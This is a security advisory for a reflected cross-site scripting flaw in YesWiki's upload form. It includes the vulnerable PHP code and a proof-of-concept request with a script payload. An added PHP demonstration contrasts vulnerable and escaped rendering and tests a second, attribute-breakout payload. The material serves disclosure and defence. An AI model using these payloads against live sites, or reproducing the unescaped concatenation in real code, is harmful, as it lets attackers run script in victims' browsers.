
GSA_kwCzR0hTQS0yZjhwLXFxeDItZ3dyMs4ABHQO

Severity: High
EPSS: 0.00091% (0.26851 percentile)

YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting

Affected Packages          Affected Versions   Fixed Versions
packagist:yeswiki/yeswiki  <= 4.5.3            No known fixed version

Package stats: 0 dependent packages, 0 dependent repositories, 18 downloads total

Affected Version Ranges

All affected versions

4.1.0, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.3.1, 4.4.0, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 4.4.5, 4.5.0, 4.5.1, 4.5.2, 4.5.3

Summary

Reflected XSS has been detected in the file upload form. The vulnerability can be exploited without authentication.

This proof of concept was performed using the following:

  • YesWiki v4.5.3 (doryphore-dev branch)
  • Docker environment (docker/docker-compose.yml)

Vulnerable code

The vulnerability is located in the file

        public function showUploadForm()
        {
            // Source: the raw query parameter is stored without validation or encoding.
            $this->file = $_GET['file'];
            // Sink 1: reflected unescaped into the <h3> text (HTML element context).
            echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n";
            echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n"
                . '	<input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n"
                . '	<input type="hidden" name="MAX_FILE_SIZE" value="' . $this->attachConfig['max_file_size'] . "\" />\n"
                // Sink 2: reflected again inside a double-quoted attribute value (HTML attribute context).
                . "	<input type=\"hidden\" name=\"file\" value=\"$this->file\" />\n"
                . "	<input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
                . '	<input class="btn btn-primary" type="submit" value="' . _t('ATTACH_SAVE') . "\" />\n"
                . "</form>\n";
        }

PoC

  1. Send a GET request to the upload endpoint with the file parameter set to a script payload. The value is reflected unescaped, so client-side JavaScript execution is obtained:
GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: localhost:8085
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
  2. Observe the response: the payload is reflected unescaped and the browser executes it.
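The following stand-alone script is an added illustration of the vulnerable pattern and the PoC above; it is neither YesWiki's code nor the project's fix. It renders the upload form two ways (a copy of the vulnerable concatenation, and an assumed hardened version that HTML-encodes the value on output), feeds both the advisory's payload plus two constructed inputs, and uses a small DOM-based oracle to decide whether the value ended up inert. The label text, the hard-coded form action, the function names and the oracle are all simplifications introduced here; it assumes PHP 7.4+ with ext-dom.

```php
<?php
// Added example (not YesWiki's code, not the project's fix): a stand-alone script that
// renders the upload form the way showUploadForm() does, then the way an escaped
// version would, and checks both against the advisory's PoC payload.
// Run with: php upload_form_xss_demo.php
declare(strict_types=1);

// The payload from the advisory's PoC request (URL-decoded).
const POC_PAYLOAD = '<script>alert(document.domain)</script>';

// Mirrors the vulnerable pattern: the request value is concatenated straight into
// the <h3> text and into the hidden input's value attribute. The label text and the
// form action are hard-coded stand-ins for _t(...) and $this->wiki->href(...).
function renderUploadFormVulnerable(string $file): string
{
    return '<h3>Upload form for file ' . $file . "</h3>\n"
        . '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="/PagePrincipale/upload">' . "\n"
        . "\t<input type=\"hidden\" name=\"file\" value=\"$file\" />\n"
        . "\t<input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
        . "</form>\n";
}

// Assumed fix: encode on output with ENT_QUOTES so the value is inert in both the
// element context (<h3>) and the double-quoted attribute context (value="...").
// Restricting $file to a plain file name (basename + allowlist) would be a sensible
// second layer, but encoding alone closes the reflected XSS shown here.
function renderUploadFormHardened(string $file): string
{
    $safe = htmlspecialchars($file, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h3>Upload form for file ' . $safe . "</h3>\n"
        . '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="/PagePrincipale/upload">' . "\n"
        . "\t<input type=\"hidden\" name=\"file\" value=\"$safe\" />\n"
        . "\t<input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
        . "</form>\n";
}

// Oracle: parse the rendered HTML roughly the way a browser would (ext-dom / libxml)
// and require that no <script> element exists, no input carries an on* handler, and
// the hidden "file" input's value round-trips to exactly the string that was supplied.
function isRenderedSafely(string $file, string $html): bool
{
    $dom = new DOMDocument();
    libxml_use_internal_errors(true); // libxml is noisy about HTML5 markup; ignore it
    $dom->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    if ($dom->getElementsByTagName('script')->length > 0) {
        return false; // element-context injection: a real <script> element was created
    }
    foreach ($dom->getElementsByTagName('input') as $input) {
        foreach ($input->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                return false; // attribute breakout created an event handler
            }
        }
        if ($input->getAttribute('name') === 'file' && $input->getAttribute('value') !== $file) {
            return false; // the parser saw a different value than the one supplied
        }
    }
    return true;
}

// Constructed test inputs: the advisory's payload, an attribute-context breakout that
// contains no <script> tag at all, and a benign file name as a control.
$cases = [
    'PoC payload from advisory'        => POC_PAYLOAD,
    'attribute breakout (constructed)' => '" autofocus onfocus="alert(document.domain)',
    'benign name (control)'            => 'report.pdf',
];
foreach ($cases as $label => $file) {
    foreach (['vulnerable' => 'renderUploadFormVulnerable', 'hardened' => 'renderUploadFormHardened'] as $variant => $render) {
        $verdict = isRenderedSafely($file, $render($file)) ? 'inert' : 'INJECTED';
        printf("%-34s %-10s %s\n", $label, $variant, $verdict);
    }
}
```

The vulnerable renderer fails for both hostile inputs: the advisory's payload becomes a real script element via the <h3> sink, and the constructed breakout never needs a < character because the second sink is an attribute value. The hardened renderer passes all three because the parser decodes the entities back into plain text. ENT_QUOTES is passed explicitly on purpose: before PHP 8.1 the default flags of htmlspecialchars() do not encode single quotes, which would matter if a value were ever placed in a single-quoted attribute.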

Impact

This vulnerability allows any unauthenticated attacker to craft a link which, when opened by a victim, executes attacker-controlled JavaScript in the victim's browser within the context of the YesWiki site, allowing actions to be performed as the victim.
